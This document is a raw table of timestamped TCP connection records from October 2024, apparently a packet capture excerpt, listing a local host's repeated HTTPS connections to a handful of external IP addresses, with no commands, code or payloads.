                                                                                                        Oct 4, 2024 15:11:25.145415068 CEST44349729104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.188363075 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.188435078 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.188515902 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:25.188988924 CEST49728443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:25.189007998 CEST44349728103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.320699930 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.321315050 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.321333885 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.325051069 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.325510979 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.325635910 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.325679064 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.367335081 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.371406078 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.456248045 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.456340075 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.456414938 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.456909895 CEST49735443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.456935883 CEST44349735104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.502799988 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.503125906 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.503149033 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.503614902 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.503952980 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.504060030 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.504122019 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.551399946 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.558374882 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.639916897 CEST4968080192.168.2.16192.229.211.108
                                                                                                        Oct 4, 2024 15:11:25.649501085 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.649591923 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.649655104 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.649667025 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.649718046 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.650295019 CEST49736443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.650310993 CEST44349736104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.666753054 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.666789055 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:25.667160988 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.667423964 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:25.667437077 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.134627104 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.134999990 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.135014057 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.135461092 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.135857105 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.135926962 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.136008024 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.182369947 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.182387114 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.266330957 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.266418934 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.266788960 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.267630100 CEST49737443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.267651081 CEST44349737104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.269973040 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.270009041 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.270178080 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.270558119 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.270566940 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.745157957 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.745488882 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.745506048 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.745861053 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.746192932 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.746263981 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.746341944 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:26.787411928 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.894320965 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.894404888 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:26.894490004 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.015167952 CEST49738443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.015202045 CEST44349738104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.117429972 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.117479086 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.117571115 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.117811918 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.117820024 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.574865103 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.575160980 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.575177908 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.575583935 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.575879097 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.575942039 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.576019049 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.576153040 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.576178074 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.576252937 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.576292038 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831013918 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831115961 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831154108 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831168890 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.831188917 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831347942 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.831520081 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831624031 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.831672907 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.831681967 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.832644939 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.832678080 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.832710028 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.832740068 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.832747936 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.832757950 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.836169004 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.836222887 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.836232901 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.876369953 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.916836023 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917757988 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917784929 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917810917 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917861938 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917903900 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917933941 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.917933941 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.917942047 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917951107 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.917954922 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.917994022 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.918005943 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.918078899 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.918142080 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.918203115 CEST49739443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.918216944 CEST44349739104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.920686960 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.920731068 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:27.920912981 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.921097040 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:27.921103001 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.440601110 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.440876007 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.440884113 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.441255093 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.441554070 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.441606045 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.441683054 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.482359886 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.482367039 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.630430937 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.630532980 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:28.630680084 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.631104946 CEST49740443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:28.631118059 CEST44349740104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.152967930 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.153027058 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.153222084 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.153345108 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.153356075 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.393876076 CEST44349719142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.393954992 CEST44349719142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.394052982 CEST49719443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:11:31.658071995 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.658888102 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.658899069 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.659276009 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.659816027 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.659914017 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.660048962 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.660149097 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.660187006 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.660265923 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.660281897 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.660296917 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928638935 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928694010 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928762913 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928795099 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928829908 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.928864956 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.928895950 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.929527044 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.929577112 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.930211067 CEST49741443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.930233955 CEST44349741104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.932451010 CEST49719443192.168.2.16142.250.186.164
                                                                                                        Oct 4, 2024 15:11:31.932478905 CEST44349719142.250.186.164192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.932787895 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.932833910 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.932914019 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.933115959 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:31.933131933 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.936414957 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:31.936455011 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:31.936525106 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:31.936753988 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:31.936764002 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.395792961 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.396123886 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:32.396148920 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.396568060 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.396866083 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:32.396927118 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.396995068 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:32.443406105 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.541667938 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.541749954 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.541816950 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:32.542354107 CEST49742443192.168.2.16104.18.94.41
                                                                                                        Oct 4, 2024 15:11:32.542383909 CEST44349742104.18.94.41192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.858477116 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.858792067 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:32.858810902 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.859155893 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.859458923 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:32.859587908 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.859596968 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:32.859638929 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:32.859647036 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:32.901387930 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.189338923 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.189599991 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.189666033 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.190164089 CEST49743443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.190184116 CEST44349743103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.195785999 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.195831060 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.195915937 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.196013927 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.196057081 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.196111917 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.196218014 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.196233034 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:33.196444035 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:33.196458101 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.087127924 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.091785908 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.091799021 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.092180014 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.092906952 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.092977047 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.093079090 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.093197107 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.093202114 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.097707987 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.099272013 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.099287987 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.099936962 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.112437963 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:34.112525940 CEST44349744103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:34.163435936 CEST49744443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:35.798355103 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:35.798434973 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:35.798540115 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:35.799595118 CEST49745443192.168.2.16103.159.65.146
                                                                                                        Oct 4, 2024 15:11:35.799612999 CEST44349745103.159.65.146192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.131038904 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131078959 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.131159067 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131378889 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131429911 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.131493092 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131735086 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131752968 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.131889105 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.131897926 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.639096975 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.639374018 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.639394999 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.640451908 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.640556097 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641539097 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641539097 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641621113 CEST44349746188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.641629934 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641730070 CEST49746443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641925097 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.641933918 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.642009020 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.642195940 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.642206907 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.646291018 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.646505117 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.646517038 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.647573948 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.647661924 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.647958040 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.647969961 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648004055 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648022890 CEST44349747188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.648076057 CEST49747443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648204088 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648243904 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:36.648319006 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648479939 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:36.648494005 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.263485909 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.263828993 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.263844967 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.264517069 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.264697075 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.264723063 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.264965057 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.265050888 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.265939951 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.266011000 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.266119003 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.266196012 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.266637087 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.266647100 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.267030954 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.267113924 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.308446884 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.308461905 CEST49748443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:37.308470964 CEST44349749188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:37.356471062 CEST49749443192.168.2.16188.114.97.3
                                                                                                        Oct 4, 2024 15:11:38.067013979 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067105055 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067137003 CEST44349748188.114.97.3192.168.2.16
                                                                                                        Oct 4, 2024 15:11:38.067164898 CEST49748443192.168.2.16188.114.97.3
